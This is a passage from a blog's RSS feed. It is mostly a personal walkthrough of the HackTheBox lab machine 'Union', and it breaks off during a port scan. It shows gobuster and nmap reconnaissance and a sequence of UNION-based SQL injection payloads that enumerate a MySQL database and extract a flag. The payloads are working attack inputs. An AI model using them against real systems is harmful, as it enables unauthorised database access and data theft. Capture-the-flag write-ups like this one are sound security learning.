&lt;p&gt;&lt;a href=&quot;https://en.wikipedia.org/wiki/Marc_Andreessen&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Marc Andreessen&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;’s contention that &lt;a href=&quot;https://a16z.com/its-time-to-build/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;“it’s time to build”&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; has become something of a rallying cry among techno-optimists. But in the age of AI, “it’s time to build” is only half the picture.&lt;/p&gt;
&lt;p&gt;Now is also the time to &lt;em&gt;explore&lt;/em&gt;.&lt;/p&gt; ]]></description>
    <pubDate>Tue, 23 Jan 2024 00:00:00 GMT</pubDate>
  </item><item>
    <title>Union</title>
    <link>https://remarks.delphi-strategy.com/ctfs/2023-04-27</link>
    <guid>https://remarks.delphi-strategy.com/ctfs/2023-04-27</guid>
    <description><![CDATA[ &lt;h1 id=&quot;union&quot;&gt;Union&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#union&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;blockquote class=&quot;callout note&quot; data-callout=&quot;note&quot;&gt;
&lt;div class=&quot;callout-title&quot;&gt;
                  &lt;div class=&quot;callout-icon&quot;&gt;&lt;/div&gt;
                  &lt;div class=&quot;callout-title-inner&quot;&gt;&lt;p&gt;Note&lt;/p&gt;&lt;/div&gt;
                  
                &lt;/div&gt;
&lt;div class=&quot;callout-content&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://app.hackthebox.com/machines/418&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;“Union” on HackTheBox&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;blockquote class=&quot;callout tip&quot; data-callout=&quot;tip&quot;&gt;
&lt;div class=&quot;callout-title&quot;&gt;
                  &lt;div class=&quot;callout-icon&quot;&gt;&lt;/div&gt;
                  &lt;div class=&quot;callout-title-inner&quot;&gt;&lt;p&gt;Important&lt;/p&gt;&lt;/div&gt;
                  
                &lt;/div&gt;
&lt;div class=&quot;callout-content&quot;&gt;
&lt;p&gt;I joined the Discord server for the team I worked on this with ~35 minutes late, as I was having trouble setting up the HackTheBox VPN (the solution was to change my VPN region to EU, then back to US, and &lt;em&gt;then&lt;/em&gt; re-download the .ovpn file), and then didn’t have the right invite link!&lt;/p&gt;
&lt;p&gt;Anyways, this was my first box in a &lt;em&gt;long&lt;/em&gt; time, and boy am I rusty!&lt;/p&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;The target IP is 10.129.202.139 (at least initially). The index.php page seems to accept any input (&lt;code&gt;player=foo&lt;/code&gt;), and directs the “player” to the challenge.php page. There’s a single-element form here, but it doesn’t seem to do anything on submission (&lt;code&gt;flag=bar&lt;/code&gt;)?&lt;/p&gt;
&lt;p&gt;Running &lt;a href=&quot;https://github.com/Oj/gobuster&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;gobuster&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; to try to enumerate potentially common directories:&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;gobuster&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -t&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 50&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; dir&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -u&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; http://10.129.202.139&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -w&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; /usr/share/wordlists/dirb/common.txt&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Results:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/css       -&gt; /css/
/index.php
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Not much help there. Let’s try the same thing with some common extensions:&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;gobuster&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -t&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 50&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; dir&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -u&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; http://10.129.202.139&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;         -w&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; /usr/share/wordlists/dirb/common.txt&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;         -x&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; .php,.html,.htm,.txt,.md,.js,.css&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Results:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/config.php
/css          -&gt; /css/
/firewall.php
/index.php
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href=&quot;https://www.freecodecamp.org/news/gobuster-tutorial-find-hidden-directories-sub-domains-and-s3-buckets/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;A general reminder about how to use gobuster.&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The /config.php and /firewall.php files look interesting!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;/config.php just returns a zero-length document. Booo!&lt;/li&gt;
&lt;li&gt;/firewall.php just returns &lt;code&gt;Access Denied&lt;/code&gt; .&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Alright, let’s try &lt;a href=&quot;https://nmap.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Nmap&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;:&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;sudo&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; nmap&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -v&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -oN&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; union&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -Pn&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -A&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; --reason&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -T4&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -p-&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10.129.202.139&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Host discovery disabled (-Pn). All addresses will be marked &#039;up&#039; and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 19:24 MDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:24
Completed Parallel DNS resolution of 1 host. at 19:24, 0.02s elapsed
Initiating SYN Stealth Scan at 19:24
Scanning 10.129.202.139 [65535 ports]
Discovered open port 80/tcp on 10.129.202.139
SYN Stealth Scan Timing: About 21.06% done; ETC: 19:26 (0:01:56 remaining)
SYN Stealth Scan Timing: About 55.83% done; ETC: 19:26 (0:00:48 remaining)
Completed SYN Stealth Scan at 19:25, 91.51s elapsed (65535 total ports)
Initiating Service scan at 19:25
Scanning 1 service on 10.129.202.139
Completed Service scan at 19:26, 6.12s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.129.202.139
Retrying OS detection (try #2) against 10.129.202.139
Initiating Traceroute at 19:26
Completed Traceroute at 19:26, 0.07s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 19:26
Completed Parallel DNS resolution of 2 hosts. at 19:26, 0.02s elapsed
NSE: Script scanning 10.129.202.139.
Initiating NSE at 19:26
Completed NSE at 19:26, 5.07s elapsed
Initiating NSE at 19:26
Completed NSE at 19:26, 0.22s elapsed
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Nmap scan report for 10.129.202.139
Host is up, received user-set (0.058s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|http-server-header: nginx/1.18.0 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|      httponly flag not set
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-title: Site doesn&#039;t have a title (text/html; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (94%), Linux 4.15 - 5.6 (92%), Linux 5.0 - 5.4 (91%), Linux 5.3 - 5.4 (91%), Linux 5.0 (90%), Linux 5.0 - 5.3 (90%), Linux 5.4 (90%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.153 days (since Fri Mar 31 15:46:21 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   63.08 ms 10.10.14.1
2   63.24 ms 10.129.202.139

NSE: Script Post-scanning.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.94 seconds
           Raw packets sent: 131215 (5.777MB) | Rcvd: 251 (19.772KB)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Well, that’s less than helpful; we already knew that there was a web server running on port 80 (and there’s nothing else).&lt;/p&gt;
&lt;p&gt;Okay, let’s try fuzzing the two pages with &lt;a href=&quot;https://portswigger.net/burp&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Burp Suite&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; and see what we get! Interesting observations…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;/index.php
&lt;ol&gt;
&lt;li&gt;Submitting hexadecimal numbers for &lt;code&gt;player&lt;/code&gt; (for example, 0x0 or 0xabad1dea) result in only the &lt;em&gt;first&lt;/em&gt; half of the normal response, without any HTML or the /challenge.php link.&lt;/li&gt;
&lt;li&gt;You can insert any HTML you’d like, and it gets rendered back in the page.&lt;/li&gt;
&lt;li&gt;Inputs always seem to be lower-cased before they’re returned.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&#039; OR 1=1 -- 1&lt;/code&gt; and &lt;code&gt;&#039; OR &#039;1&#039;=&#039;1&lt;/code&gt; are &lt;em&gt;also&lt;/em&gt; missing the second half of the response, like the 0x numbers. So maybe we have SQL injection?&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;/challenge.php returns nothing interesting…&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;(I really need a more targeted fuzzing list than the “big list of naughty strings”, as the free version of &lt;a href=&quot;https://portswigger.net/burp&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Burp Suite&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; throttles Intruder so much that this list takes over 30 minutes to process!)&lt;/p&gt;
&lt;p&gt;(Also, be sure to look at the response in &lt;strong&gt;Raw&lt;/strong&gt; mode to avoid going down bunny trails about formatting changes that ​&lt;em&gt;don’t actually exist in the server response&lt;/em&gt;​!)&lt;/p&gt;
&lt;p&gt;Okay, so not many clues at this point. SQL injection &lt;em&gt;might&lt;/em&gt; be a thing, but the behavior with hexadecimal numbers is… Odd.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;So, here I’m going to “cheat” a bit. I know from the discussion on Discord that SQL injection &lt;em&gt;is&lt;/em&gt; a thing for this box, and is, in fact, how you get the first flag. So even though my evidence at this point is circumstantial/weak, I’m going to go that route.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Since &lt;code&gt;&#039; OR 1=1 -- 1&lt;/code&gt; gave us something interesting, let’s send /index.php to Repeater and see what some other values for &lt;code&gt;player&lt;/code&gt; do for us…&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT &#039;&gt;&gt;&gt;STUFF&amp;#x3C;&amp;#x3C;&amp;#x3C;&#039; -- 1&lt;/code&gt; returns &lt;code&gt;&gt;&gt;&gt;STUFF&amp;#x3C;&amp;#x3C;&amp;#x3C;&lt;/code&gt; for the user name!&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT @@datadir -- 1&lt;/code&gt; returns &lt;code&gt;/var/lib/mysql&lt;/code&gt;, so we’re dealing with MySQL.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT schema_name FROM information_schema.schemata -- 1&lt;/code&gt; returns &lt;code&gt;mysql&lt;/code&gt; … Which isn’t right. It looks like only a single row (probably the last one, given that we only see one row with &lt;code&gt;UNION&lt;/code&gt; ) is returned.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0 -- 1&lt;/code&gt; also returns &lt;code&gt;mysql&lt;/code&gt; … But using &lt;code&gt;OFFSET 1&lt;/code&gt; returns &lt;code&gt;information_schema&lt;/code&gt; , so I guess we’ll just do it this way. Iterating, we also see databases called &lt;code&gt;performance_schema&lt;/code&gt; , &lt;code&gt;sys&lt;/code&gt; , and &lt;code&gt;november&lt;/code&gt; . All of these are standard MySQL databases except for &lt;code&gt;november&lt;/code&gt; .&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT database() -- 1&lt;/code&gt; confirms that we’re in the &lt;code&gt;november&lt;/code&gt; database.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT table_name FROM information_schema.tables WHERE table_schema != &#039;november&#039; LIMIT 1 OFFSET 0 -- 1&lt;/code&gt; returns &lt;code&gt;flag&lt;/code&gt; , and iterating reveals a second table &lt;code&gt;players&lt;/code&gt; . There doesn’t seem to be anything else. The &lt;code&gt;flag&lt;/code&gt; table looks promising, so let’s see what’s there.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT column_name FROM information_schema.columns WHERE table_schema = &#039;november&#039; and table_name = &#039;flag&#039; LIMIT 1 OFFSET 0 -- 1&lt;/code&gt; (and iterating) reveals that there’s a single column called &lt;code&gt;one&lt;/code&gt; .&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT COUNT(*) FROM flag -- 1&lt;/code&gt; reveals that there’s only a single row in &lt;code&gt;flag&lt;/code&gt; . Easy!&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT one FROM flag -- 1&lt;/code&gt; then provides a “flag” value.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;(The above is made possible using &lt;a href=&quot;https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;this handy SQL injection cheat-sheet for MySQL&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;.)&lt;/p&gt;
&lt;p&gt;Now, as it turns out, this is &lt;em&gt;not&lt;/em&gt; a flag for the box! Instead, inputting it into /challenge.php generates the message that &lt;code&gt;Your IP Address has now been granted SSH Access&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Let’s confirm…&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;sudo&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; nmap&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -v&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -oN&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; union2&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -Pn&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -A&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; --reason&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -T4&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -p-&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10.129.202.139&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Host discovery disabled (-Pn). All addresses will be marked &#039;up&#039; and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 21:16 MDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:16
Completed NSE at 21:16, 0.00s elapsed
Initiating NSE at 21:16
Completed NSE at 21:16, 0.00s elapsed
Initiating NSE at 21:16
Completed NSE at 21:16, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:16
Completed Parallel DNS resolution of 1 host. at 21:16, 0.01s elapsed
Initiating SYN Stealth Scan at 21:16
Scanning 10.129.202.139 [65535 ports]
Discovered open port 22/tcp on 10.129.202.139
Discovered open port 80/tcp on 10.129.202.139
Completed SYN Stealth Scan at 21:17, 35.32s elapsed (65535 total ports)
Initiating Service scan at 21:17
Scanning 2 services on 10.129.202.139
Completed Service scan at 21:17, 6.12s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.129.202.139
Retrying OS detection (try #2) against 10.129.202.139
Retrying OS detection (try #3) against 10.129.202.139
Retrying OS detection (try #4) against 10.129.202.139
Retrying OS detection (try #5) against 10.129.202.139
Initiating Traceroute at 21:17
Completed Traceroute at 21:17, 0.06s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:17
Completed Parallel DNS resolution of 2 hosts. at 21:17, 0.01s elapsed
NSE: Script scanning 10.129.202.139.
Initiating NSE at 21:17
Completed NSE at 21:17, 1.73s elapsed
Initiating NSE at 21:17
Completed NSE at 21:17, 0.27s elapsed
Initiating NSE at 21:17
Completed NSE at 21:17, 0.02s elapsed
Nmap scan report for 10.129.202.139
Host is up, received user-set (0.054s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 ea8421a3224a7df9b525517983a4f5f2 (RSA)
|   256 b8399ef488beaa01732d10fb447f8461 (ECDSA)
|_  256 2221e9f485908745161f733641ee3b32 (ED25519)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|http-title: Site doesn&#039;t have a title (text/html; charset=UTF-8).
| http-methods:
|  Supported Methods: GET HEAD POST
